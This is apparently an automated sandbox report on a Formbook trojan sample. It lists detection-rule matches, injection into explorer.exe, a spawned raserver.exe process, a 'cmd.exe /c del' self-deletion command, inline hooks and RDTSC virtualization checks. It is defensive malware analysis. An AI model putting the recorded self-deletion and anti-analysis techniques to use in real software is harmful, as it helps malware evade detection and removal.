              Source: jqPZZhDmjh.exe, type: SAMPLEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0.2.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0.2.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0.0.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0.0.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0.0.jqPZZhDmjh.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.3313647278.000000000DF94000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
              Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: Process Memory Space: jqPZZhDmjh.exe PID: 6964, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
              Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: raserver.exe PID: 2656, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: jqPZZhDmjh.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: jqPZZhDmjh.exeStatic PE information: Section .text
              Source: classification engineClassification label: mal100.troj.evad.winEXE@6/0@5/2
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
              Source: jqPZZhDmjh.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\explorer.exeFile read: C:\Program Files (x86)\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: jqPZZhDmjh.exeReversingLabs: Detection: 89%
              Source: jqPZZhDmjh.exeVirustotal: Detection: 71%
              Source: unknownProcess created: C:\Users\user\Desktop\jqPZZhDmjh.exe C:\Users\user\Desktop\jqPZZhDmjh.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
              Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\jqPZZhDmjh.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exeJump to behavior
              Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\jqPZZhDmjh.exe"Jump to behavior
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
              Source: jqPZZhDmjh.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: wntdll.pdbUGP source: jqPZZhDmjh.exe, 00000000.00000003.2053878549.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000003.2051833702.0000000001217000.00000004.00000020.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000002.2119541533.000000000171E000.00000040.00001000.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000003.00000002.3300751404.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000003.00000003.2120183024.00000000041F7000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000003.00000002.3300751404.000000000453E000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000003.00000003.2117914858.0000000004043000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: jqPZZhDmjh.exe, jqPZZhDmjh.exe, 00000000.00000003.2053878549.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000003.2051833702.0000000001217000.00000004.00000020.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000002.2119541533.000000000171E000.00000040.00001000.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, raserver.exe, 00000003.00000002.3300751404.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000003.00000003.2120183024.00000000041F7000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000003.00000002.3300751404.000000000453E000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000003.00000003.2117914858.0000000004043000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RAServer.pdb source: jqPZZhDmjh.exe, 00000000.00000002.2120687232.0000000001920000.00000040.10000000.00040000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000003.2117296757.0000000001060000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000003.00000002.3300330935.0000000000880000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: RAServer.pdbGCTL source: jqPZZhDmjh.exe, 00000000.00000002.2120687232.0000000001920000.00000040.10000000.00040000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000003.2117296757.0000000001060000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000003.00000002.3300330935.0000000000880000.00000040.80000000.00040000.00000000.sdmp
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_009869CB pushad ; retf 0_2_009869CC
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_00977A0B push cs; retf 0_2_00977A0C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0098D3A3 push ss; iretd 0_2_0098D3A6
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_00979BCC push es; iretd 0_2_00979BCE
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0097E329 push eax; iretd 0_2_0097E32A
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0098D4A5 push eax; ret 0_2_0098D4F8
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0097B4C7 push edx; retf 0_2_0097B4CD
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0098D4FB push eax; ret 0_2_0098D562
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0098D4F2 push eax; ret 0_2_0098D4F8
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_00986C49 push ebp; retf 0_2_00986C56
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0098D55C push eax; ret 0_2_0098D562
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_009866D8 push ebp; iretd 0_2_009866E5
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_009877F3 push eax; iretd 0_2_00987802
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_00977710 push edi; ret 0_2_00977711
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B09AD push ecx; mov dword ptr [esp], ecx0_2_015B09B6
              Source: C:\Windows\explorer.exeCode function: 2_2_0DF7F9B5 push esp; retn 0000h2_2_0DF7FAE7
              Source: C:\Windows\explorer.exeCode function: 2_2_0DF7FB1E push esp; retn 0000h2_2_0DF7FB1F
              Source: C:\Windows\explorer.exeCode function: 2_2_0DF7FB02 push esp; retn 0000h2_2_0DF7FB03
              Source: C:\Windows\explorer.exeCode function: 2_2_0DF40000 push C649BDF0h; ret 2_2_0DF40005
              Source: C:\Windows\explorer.exeCode function: 2_2_1011F9B5 push esp; retn 0000h2_2_1011FAE7
              Source: C:\Windows\explorer.exeCode function: 2_2_1011FB1E push esp; retn 0000h2_2_1011FB1F
              Source: C:\Windows\explorer.exeCode function: 2_2_1011FB02 push esp; retn 0000h2_2_1011FB03
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043A27FA pushad ; ret 3_2_043A27F9
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043A225F pushad ; ret 3_2_043A27F9
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043A283D push eax; iretd 3_2_043A2858
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043D09AD push ecx; mov dword ptr [esp], ecx3_2_043D09B6
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004CE329 push eax; iretd 3_2_004CE32A
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004D66D8 push ebp; iretd 3_2_004D66E5
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004D69CB pushad ; retf 3_2_004D69CC
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004D6C49 push ebp; retf 3_2_004D6C56
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004DD3A3 push ss; iretd 3_2_004DD3A6
              Source: jqPZZhDmjh.exeStatic PE information: section name: .text entropy: 7.406763653212094

              Hooking and other Techniques for Hiding and Protection

              barindex
              Modifies the prolog of user mode functions (user mode inline hooks)
              Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE5
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeRDTSC instruction interceptor: First address: 0000000000979904 second address: 000000000097990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeRDTSC instruction interceptor: First address: 0000000000979B6E second address: 0000000000979B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000004C9904 second address: 00000000004C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000004C9B6E second address: 00000000004C9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_00979AA0 rdtsc 0_2_00979AA0
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8693Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1247Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 882Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 866Jump to behavior
              Source: C:\Windows\SysWOW64\raserver.exeWindow / User API: threadDelayed 1028Jump to behavior
              Source: C:\Windows\SysWOW64\raserver.exeWindow / User API: threadDelayed 8946Jump to behavior
              Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeAPI coverage: 1.7 %
              Source: C:\Windows\SysWOW64\raserver.exeAPI coverage: 1.8 %
              Source: C:\Windows\explorer.exe TID: 4916Thread sleep count: 8693 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 4916Thread sleep time: -17386000s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 4916Thread sleep count: 1247 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 4916Thread sleep time: -2494000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\raserver.exe TID: 4036Thread sleep count: 1028 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\raserver.exe TID: 4036Thread sleep time: -2056000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\raserver.exe TID: 4036Thread sleep count: 8946 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\raserver.exe TID: 4036Thread sleep time: -17892000s >= -30000sJump to behavior
